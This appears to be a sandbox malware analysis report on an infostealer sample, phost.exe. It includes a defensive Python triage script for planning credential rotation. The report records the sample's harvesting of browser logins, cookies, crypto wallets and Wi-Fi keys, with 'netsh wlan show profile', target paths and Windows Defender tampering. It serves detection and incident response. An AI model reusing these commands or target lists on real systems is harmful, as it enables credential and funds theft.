Source: Yara match | File source: 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1702090319.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2178616618.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2170059092.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2166479596.000001AE1E122000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2173409124.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2175138187.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1680237831.000001C32AC85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1680237831.000001C32AC83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2176893974.000001AE1D044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2169952863.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2172415408.000001AE1D7E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2177462355.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: phost.exe PID: 3220, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: phost.exe PID: 3444, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI32202\rarreg.key, type: DROPPED
Source: Yara match | File source: Process Memory Space: phost.exe PID: 3444, type: MEMORYSTR
Source: phost.exe, 00000001.00000003.1842261128.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets.
Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: fJaxx
Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Exodus
Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Ethereum
Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile (2 times)
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet (2 times)
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
Source: C:\Users\user\Desktop\phost.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets (2 times)
Source: Yara match | File source: Process Memory Space: phost.exe PID: 3444, type: MEMORYSTR
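The file-open rows above are the evidence an incident responder needs to scope credential rotation: Chrome and Edge Login Data, Chrome Network\Cookies and Web Data, Firefox cookies.sqlite and places.sqlite, two Chrome extension storage directories and five desktop wallet locations. The Python below is an added example, not part of the report: it classifies "File opened" rows into credential classes and derives a rotation plan. The sample rows are copied from the list above (with and without the page's "Jump to behavior" suffix, since the parser has to cope with raw extracts), the two extension IDs are assumed to be MetaMask builds (verify before acting on that), and the category names and rotation text are this example's own.

```python
import re
from collections import defaultdict

# Row format used by the report: "Source: <image>File opened: <path>[Jump to behavior]"
ROW = re.compile(r"File opened:\s*(?P<path>.+?)(?:Jump to behavior)?\s*$")

# (category, path pattern); first match wins, so more specific entries come first.
CLASSIFIERS = [
    ("chromium_logins",   re.compile(r"\\User Data\\[^\\]+\\Login Data$", re.I)),
    ("chromium_cookies",  re.compile(r"\\User Data\\[^\\]+\\Network\\Cookies$", re.I)),
    ("chromium_autofill", re.compile(r"\\User Data\\[^\\]+\\Web Data$", re.I)),
    ("chromium_history",  re.compile(r"\\User Data\\[^\\]+\\History$", re.I)),
    ("firefox_cookies",   re.compile(r"\\Firefox\\Profiles\\[^\\]+\\cookies\.sqlite$", re.I)),
    ("firefox_history",   re.compile(r"\\Firefox\\Profiles\\[^\\]+\\places\.sqlite$", re.I)),
    # Assumption: these two extension IDs are the Chrome Web Store and Edge builds of MetaMask.
    ("wallet_extension",  re.compile(r"\\Local Extension Settings\\"
                                     r"(nkbihfbeogaeaoehlefnkodbefgpgknn|ejbalbakoplchlghecdalmeeeajnimhm)$", re.I)),
    ("wallet_desktop",    re.compile(r"\\AppData\\(Roaming|Local)\\"
                                     r"(Exodus|Electrum|atomic|Guarda|Coinomi|com\.liberty\.jaxx)\\", re.I)),
    ("browser_other",     re.compile(r"\\(Google\\Chrome|Microsoft\\Edge|Mozilla\\Firefox)\\", re.I)),
]

# What the responder has to do per category; order is priority order.
ROTATE = {
    "chromium_logins":  "reset every password saved in Chrome/Edge",
    "chromium_cookies": "invalidate all web sessions: stolen cookies bypass MFA",
    "firefox_cookies":  "invalidate all web sessions: stolen cookies bypass MFA",
    "chromium_autofill": "treat saved card numbers and addresses as exposed",
    "wallet_extension": "move funds out of browser-extension wallets to fresh seeds",
    "wallet_desktop":   "move funds out of desktop wallets to fresh seeds",
}


def triage(report_lines):
    """Map each 'File opened' path to one category; returns {category: sorted unique paths}."""
    buckets = defaultdict(set)
    for line in report_lines:
        m = ROW.search(line)
        if not m:
            continue
        path = m.group("path").strip()
        for category, pattern in CLASSIFIERS:
            if pattern.search(path):
                buckets[category].add(path)
                break
        else:
            buckets["unclassified"].add(path)
    return {category: sorted(paths) for category, paths in buckets.items()}


def rotation_plan(buckets):
    """Ordered, de-duplicated list of actions for the categories actually touched."""
    plan = []
    for category, action in ROTATE.items():
        if category in buckets and action not in plan:
            plan.append(action)
    return plan


# Constructed sample drawn from the report rows above.
P = r"Source: C:\Users\user\Desktop\phost.exeFile opened: "
SAMPLE_ROWS = [
    P + r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior",
    P + r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data",
    P + r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior",
    P + r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History",
    P + r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies",
    P + r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data",
    P + r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite",
    P + r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite",
    P + r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn",
    P + r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet",
    P + r"C:\Users\user\AppData\Roaming\Electrum\wallets",
    P + r"C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets",
    P + r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache",
    r"Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile",
]

if __name__ == "__main__":
    buckets = triage(SAMPLE_ROWS)
    for category, paths in buckets.items():
        print(category, len(paths))
    print(rotation_plan(buckets))
```

Opening a file is not the same as reading it, so the output is a scoping aid, not proof of exfiltration; confirm against the rar.exe archive contents or the network capture before closing the ticket.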

Remote Access Functionality

Source: Yara match | File source: 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1702090319.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2178616618.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2170059092.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2166479596.000001AE1E122000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2173409124.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2175138187.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1680237831.000001C32AC85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1680237831.000001C32AC83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2176893974.000001AE1D044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2169952863.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2172415408.000001AE1D7E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2177462355.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: phost.exe PID: 3220, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: phost.exe PID: 3444, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI32202\rarreg.key, type: DROPPED
Source: Yara match | File source: Process Memory Space: phost.exe PID: 3444, type: MEMORYSTR
MITRE ATT&CK Matrix (the number in parentheses is the report's signature hit count for that technique; entries without a number carry no hit count in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation (241); Native API (1); Command and Scripting Interpreter (122); PowerShell (3); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (11); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: File and Directory Permissions Modification (1); Disable or Modify Tools (4); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (21); Software Packing (11); DLL Side-Loading (1); Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (151); Access Token Manipulation (1); Process Injection (11)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (2); File and Directory Discovery (3); System Information Discovery (58); Security Software Discovery (261); Process Discovery (2); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (1); Network Service Discovery; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (1); Data from Local System (3); Email Collection (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: Ingress Tool Transfer (3); Encrypted Channel (21); Non-Application Layer Protocol (4); Application Layer Protocol (5); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: Data Encrypted for Impact (1); System Shutdown/Reboot (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1574326 | Sample: phost.exe | Startdate: 13/12/2024 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: ip-api.com; discord.com; blank-c9yfy.in
  Signatures: Found malware configuration; Sigma detected: Capture Wi-Fi password; Multi AV Scanner detection for submitted file; 11 other signatures
  started: phost.exe 22
    Created files: C:\Users\user\AppData\Local\Temp\...\rar.exe (PE32+, dropped); C:\Users\user\AppData\Local\...\rarreg.key (ASCII, dropped); C:\Users\user\AppData\...\unicodedata.pyd (PE32+, dropped); 16 other files (none is malicious, dropped)
    Signatures: Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; Tries to harvest and steal WLAN passwords; 2 other signatures
    started: phost.exe 107
      DNS/IP: ip-api.com 208.95.112.1, 49731, 49744, 80 TUT-ASUS United States; discord.com 162.159.137.232, 443, 49745 CLOUDFLARENETUS United States
      Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Uses cmd line tools excessively to alter registry or file data; Tries to harvest and steal browser information (history, passwords, etc); 6 other signatures
      started: cmd.exe 1
        Signatures: Suspicious powershell command line found; Uses cmd line tools excessively to alter registry or file data; Encrypted powershell cmdline option found; 2 other signatures
        started: powershell.exe 23
          Signatures: Loading BitLocker PowerShell Module
        started: conhost.exe
      started: cmd.exe 1
        Signatures: Modifies Windows Defender protection settings; Removes signatures from Windows Defender
        started: powershell.exe
        started: 2 other processes
      started: cmd.exe
        Signatures: Adds a directory exclusion to Windows Defender
        started: powershell.exe
        started: conhost.exe
      started: 35 other processes
        Signatures: Tries to harvest and steal WLAN passwords
        started: getmac.exe
          Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI
        started: systeminfo.exe
        started: 68 other processes
          Created files: C:\Users\user\AppData\...\jnxiphgt.cmdline (Unicode, dropped); C:\Users\user\AppData\Local\Temp\C7XW6.zip (RAR, dropped)
          started: csc.exe
            Created files: C:\Users\user\AppData\Local\...\jnxiphgt.dll (PE32, dropped)
            started: cvtres.exe
          started: conhost.exe
  started: svchost.exe
    DNS/IP: 127.0.0.1 unknown unknown

Source | Detection | Scanner | Label | Link
phost.exe | 34% | ReversingLabs | Win64.Trojan.Znyonm |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\_MEI32202\VCRUNTIME140.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI32202\_bz2.pyd | 4% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI32202\_ctypes.pyd | 4% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI32202\_decimal.pyd | 4% | ReversingLabs | |
